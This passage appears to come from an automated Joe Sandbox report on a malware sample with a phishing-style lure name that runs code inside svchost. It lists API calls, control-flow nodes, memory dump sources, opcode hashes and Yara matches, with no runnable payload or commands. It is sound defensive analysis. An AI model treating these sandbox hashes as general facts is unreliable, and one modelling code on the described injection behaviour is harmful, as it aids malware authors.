                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 27d0485336d071c785c834f50931a9cbea697d378de927f4b3d9c61e8013291b
                                                                            • Instruction ID: f092aa2d31d8191c396092296eea43bbfa7b530bf195eabc896d7c89a55b421e
                                                                            • Opcode Fuzzy Hash: 27d0485336d071c785c834f50931a9cbea697d378de927f4b3d9c61e8013291b
                                                                            • Instruction Fuzzy Hash: 83D01236794310B7E7A4B771DC0FFE67A1A9B00B24F01591AB74AEA1D0C9F5A801CB54
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0066BE93
                                                                            • GetLastError.KERNEL32 ref: 0066BEA1
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0066BEFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1717984340-0
                                                                            • Opcode ID: 34d95577b3b617b8e3f25b4d7858bb3c885f0cbd48d0a7b2aa2a7ca62fdfb667
                                                                            • Instruction ID: 5701fe99abf79964a85493bbb1c67b226b5e9820d0feb0eb6a4c47cbd2364c09
                                                                            • Opcode Fuzzy Hash: 34d95577b3b617b8e3f25b4d7858bb3c885f0cbd48d0a7b2aa2a7ca62fdfb667
                                                                            • Instruction Fuzzy Hash: D041D435600246EFCF218FA5CC54AFA7BA7AF41360F14A169F959D72B1DB318D81CB60

                                                                            Execution Graph

                                                                            Execution Coverage:1.2%
                                                                            Dynamic/Decrypted Code Coverage:5.9%
                                                                            Signature Coverage:8.6%
                                                                            Total number of Nodes:152
                                                                            Total number of Limit Nodes:12

                                                                            Control-flow Graph

                                                                            control_flow_graph 230 417ad3-417aef 231 417af7-417afc 230->231 232 417af2 call 42f6d3 230->232 233 417b02-417b10 call 42fcd3 231->233 234 417afe-417b01 231->234 232->231 237 417b20-417b31 call 42e173 233->237 238 417b12-417b1d call 42ff73 233->238 243 417b33-417b47 LdrLoadDll 237->243 244 417b4a-417b4d 237->244 238->237 243->244
                                                                            APIs
                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417B45
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Load
                                                                            • String ID:
                                                                            • API String ID: 2234796835-0
                                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                            • Instruction ID: 683b89875a7fb83d71da6e1f8a97b79be180c124f2fa609aa3b8b71e39b295bb
                                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                                            • Instruction Fuzzy Hash: F7011EB5E4420DBBDB10DAA5DC42FDEB378AB54308F4041AAE90897240F635EB588B95

                                                                            Control-flow Graph

                                                                            control_flow_graph 256 42ca33-42ca68 call 404803 call 42dc73 NtClose
                                                                            APIs
                                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CA63
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                            • Instruction ID: 50a5b69ca1682e878e5a40afd65bd8ed1634e2dbd60f648430f8de340d975e9a
                                                                            • Opcode Fuzzy Hash: 66657d5b165b02af58b5b66cdb422c5b63c672e050058a705595915231ac49b7
                                                                            • Instruction Fuzzy Hash: B5E08C763402147BE720FB5AEC42F9B776CDFC5710F10852AFA08A7281C6B4B90186F8

                                                                            Control-flow Graph

                                                                            control_flow_graph 271 3972b90-3972b9c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4130a1a1b51de9525d6e53c7c94bc4595027a6085df348630190a858099733a3
                                                                            • Instruction ID: e45d0fe22c788bacbe084dbb98841b6a451e4a5d83bfbc5857bf7de434ad924e
                                                                            • Opcode Fuzzy Hash: 4130a1a1b51de9525d6e53c7c94bc4595027a6085df348630190a858099733a3
                                                                            • Instruction Fuzzy Hash: 2590023120518C42D510B358850474A005587D0301F95CC15A4514658DC7A588917131
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 51f53d4e610417d32e69badea9399a1c2c64b153fbf5023020c8f22f56da74f5
                                                                            • Instruction ID: 78f39144826e440b3a9c958a1bd044bf2c3046549f54a2fdd2aa6d90c20d613a
                                                                            • Opcode Fuzzy Hash: 51f53d4e610417d32e69badea9399a1c2c64b153fbf5023020c8f22f56da74f5
                                                                            • Instruction Fuzzy Hash: 7690023120510842D500B7985508646005587E0301F91D815A5114555EC77588917131

                                                                            Control-flow Graph

                                                                            control_flow_graph 270 3972a80-3972a8c LdrInitializeThunk
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d0c9ecf8ee937ac4fc1c7152133b1d058518fd828f96ddf5bde269291513766d
                                                                            • Instruction ID: 78a42a5041fe1570410297363235fbea520bec92c96e7630e2125c2dcdfb6669
                                                                            • Opcode Fuzzy Hash: d0c9ecf8ee937ac4fc1c7152133b1d058518fd828f96ddf5bde269291513766d
                                                                            • Instruction Fuzzy Hash: 6C900261206104434505B3584514616405A87E0201B91C825E1104590DC63588917135
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 128491d48295857a45996991d5416cb9f9aa4ec36b2a05b0364400aaa67c3593
                                                                            • Instruction ID: 9f8845f36518100394076d4851fa51b7f32a1826626e0904142ccbc35d814fa6
                                                                            • Opcode Fuzzy Hash: 128491d48295857a45996991d5416cb9f9aa4ec36b2a05b0364400aaa67c3593
                                                                            • Instruction Fuzzy Hash: D290023120550842D500B358491470B005587D0302F91C815A1254555DC73588517571
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 895d4f058e58c6362fc6bdd8894c04ff933080f8bf4e4297236bd7150eedece8
                                                                            • Instruction ID: 8f7692ea395c2cbaaf50030c822096d07a6c7b3916101754a4e3b8f0fe4ce40c
                                                                            • Opcode Fuzzy Hash: 895d4f058e58c6362fc6bdd8894c04ff933080f8bf4e4297236bd7150eedece8
                                                                            • Instruction Fuzzy Hash: 9690023120510853D511B3584604707005987D0241FD1CC16A0514558DD7668952B131
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d609b1f5fa4ee78387e92230a696af2939aab473da0f01d4d9d4d940d52bd9a2
                                                                            • Instruction ID: 5c35f8c901e8b0550cfc1d727683e05a452642d2ea29ba4a5b6c15f4f3f27659
                                                                            • Opcode Fuzzy Hash: d609b1f5fa4ee78387e92230a696af2939aab473da0f01d4d9d4d940d52bd9a2
                                                                            • Instruction Fuzzy Hash: F090023160920842D500B3584614706105587D0201FA1CC15A0514568DC7A5895175B2

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                            • Instruction ID: 1c1b804c52c0fa2fc79735cf8757f94194e925b2cf622f9804a62bf2283c9d4a
                                                                            • Opcode Fuzzy Hash: e31239851aee85a2536cf6da61f787cff518875e27f6edfaa8e2894a84858e00
                                                                            • Instruction Fuzzy Hash: 4001A5B2D4111CBAEB119AD19D82DEFBB7CDF40398F00816AFA1467141D6784E468BA5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                            • Instruction ID: 66382633165677f4d287f1c9305a2e0242bca7fee9ac24ed2ff299bc6a34d21b
                                                                            • Opcode Fuzzy Hash: c2470579c8be65e49bfd338019fbf368160fbece63dc37d02d7ce0922c0166ce
                                                                            • Instruction Fuzzy Hash: 9401D6B2E4021CBADB10AAE19C82DEFBB7CDF40798F008169FA1467141D6785E068BB5

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(b427-I_1,00000111,00000000,00000000), ref: 0041437A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID: b427-I_1$b427-I_1
                                                                            • API String ID: 1836367815-3731361855
                                                                            • Opcode ID: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                            • Instruction ID: e66581b55692d0f67d3645e7f83c5c9d5bac99b1c31a45c43741cea5d306e683
                                                                            • Opcode Fuzzy Hash: 0c78152fe7af9bfe9666a3fbd71234cde2823069974fff51629e0b809ca46a0d
                                                                            • Instruction Fuzzy Hash: C301B5B2E4021CBADB119BD19C81DEFBB7CDF80398F00816AFA2467141D67C4E468BA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 216 417b83-417b87 217 417b89-417ba2 216->217 218 417b6f 216->218 221 417ba4-417be0 217->221 222 417b5f-417b62 217->222 219 417b71-417b7f 218->219 220 417b36-417b47 LdrLoadDll 218->220 226 417b81-417b82 219->226 227 417bfd-417c19 219->227 224 417b4a-417b4d 220->224 228 417be2-417bf3 221->228 229 417bf4-417c19 221->229 228->229
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                            • Instruction ID: 5fe7b0e3159e894076f386ae4157a7bafd75539a6ed586e2fa135baba6e0e4fa
                                                                            • Opcode Fuzzy Hash: 4e7030420652704376b12194149c07a63f315160b8825ddd380f325685b21786
                                                                            • Instruction Fuzzy Hash: 7E21683192D2449FDB21CA75C9866E4BB74FB9A725F1406CBD091CF242D335AC8AC784

                                                                            Control-flow Graph

                                                                            control_flow_graph 246 42cd43-42cd80 call 404803 call 42dc73 RtlAllocateHeap
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,0041E8AE,?,?,00000000,?,0041E8AE,?,?,?), ref: 0042CD7B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                            • Instruction ID: f9903ddc43aa1d478041010c95bd812e84ae6d930a69b2ca5004dc81876241ec
                                                                            • Opcode Fuzzy Hash: 27af925cc09fa346fafd11b2d7a9bc6e46addc919f118a8ecb37a125f7b6b630
                                                                            • Instruction Fuzzy Hash: F3E092B1200204BBD710EF49EC41F9B77ACEFC5750F108419FD08A7241D670B910CAB8

                                                                            Control-flow Graph

                                                                            control_flow_graph 251 42cd83-42cdc3 call 404803 call 42dc73 RtlFreeHeap
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B05C6C1,00000007,00000000,00000004,00000000,00417355,000000F4), ref: 0042CDBE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0
                                                                            • Opcode ID: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                            • Instruction ID: 9d094757069ee7fafe8343a4ae1169e8157d0d769102895cf672c55cae1e0208
                                                                            • Opcode Fuzzy Hash: 3ae13e125d1d646a9bdf0d6dc878b17524a9d002341fa1517782c7adab021431
                                                                            • Instruction Fuzzy Hash: 7AE092B52002147BDB10EE4ADC41F9B33ACEFC5710F004419FD08A7241C6B0B9108AB8

                                                                            Control-flow Graph

                                                                            control_flow_graph 261 42cdd3-42ce0f call 404803 call 42dc73 ExitProcess
                                                                            APIs
                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,3D88789B,?,?,3D88789B), ref: 0042CE0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess
                                                                            • String ID:
                                                                            • API String ID: 621844428-0
                                                                            • Opcode ID: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                            • Instruction ID: 98d1125bebf2f9484b9d6ff066c81308abae10eb618a57f9fb154900a1da49d8
                                                                            • Opcode Fuzzy Hash: d4e777c894d90f951efbef4aca7f82a43814a062413fce3ac0bea4ee7a49ce04
                                                                            • Instruction Fuzzy Hash: 40E04F7A2102147BD210BA5ADC01F97776CDFC5714F10446AFA1867241C6B17A01C6F4

                                                                            Control-flow Graph

                                                                            control_flow_graph 266 3972b2a-3972b2f 267 3972b31-3972b38 266->267 268 3972b3f-3972b46 LdrInitializeThunk 266->268
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: c26275a14d3245cd4254186cf3a7c1328f9b5b31a3fd49ff4f58df7e9fe53008
                                                                            • Instruction ID: 7e8482144cab2ab82568f0e71b996d89023cf7ed2fb70e55a3a83dc38b570a40
                                                                            • Opcode Fuzzy Hash: c26275a14d3245cd4254186cf3a7c1328f9b5b31a3fd49ff4f58df7e9fe53008
                                                                            • Instruction Fuzzy Hash: DDB02B318010C5C5DE00E720070C7073A04A7C0300F25C852D1420240F8338C080F131
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 1111c6207f17b941e1c3e32ac3aef51df3584f231138b1e3a5da1aad01d858a9
                                                                            • Instruction ID: 772926c8315f62ec0a8e66572b0a5fc12d76efbaec961d81e9d7edce4767b53d
                                                                            • Opcode Fuzzy Hash: 1111c6207f17b941e1c3e32ac3aef51df3584f231138b1e3a5da1aad01d858a9
                                                                            • Instruction Fuzzy Hash: B8424C759007199FDB60CF28C880BAAB7F9FF44314F1445A9E999DB381E770A984CFA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 63a58d2ec3b6b79bdb02542b0bc83300214869e56e362c75cee4bba21fd5b681
                                                                            • Instruction ID: 8598ebba16ddc099c34a32d718c02b510e4c8041945352ed6832a01de19f04c5
                                                                            • Opcode Fuzzy Hash: 63a58d2ec3b6b79bdb02542b0bc83300214869e56e362c75cee4bba21fd5b681
                                                                            • Instruction Fuzzy Hash: 83900225225104420545F758070450B049597D63513D1C819F1506590CC73188656331
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9ffd09d411f0580720ade11c927cc3d7bedc3c6b118d4cb94c2c3ec251cc1bc
                                                                            • Instruction ID: fce756add1e7685f472e0c0b17c772379a8e5e62513eec3db0beb7cc98638019
                                                                            • Opcode Fuzzy Hash: f9ffd09d411f0580720ade11c927cc3d7bedc3c6b118d4cb94c2c3ec251cc1bc
                                                                            • Instruction Fuzzy Hash: 639002A1205244D24900F3588504B0A455587E0201B91C81AE1144560CC6358851A135
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1b5cead274e553075d18262e01daf1fa8b758be4156491ae6b3baa9ee5f0526b
                                                                            • Instruction ID: f8aedf5b24978dcdd6dcf358b82fbe8a1c37ffb36ef217014500a22f46c26ef4
                                                                            • Opcode Fuzzy Hash: 1b5cead274e553075d18262e01daf1fa8b758be4156491ae6b3baa9ee5f0526b
                                                                            • Instruction Fuzzy Hash: 6C900435315104430505F75C070450700D7C7D53513D1CC35F1105550CD731CC717131
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.11735251368.0000000003900000.00000040.00001000.00020000.00000000.sdmp, Offset: 03900000, based on PE: true
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000001.00000002.11735251368.0000000003A2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_3900000_svchost.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 27d54449ef0490f9f701589e11fc389b7c499c94a761fc73ee6545bddcbbe6b1
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash: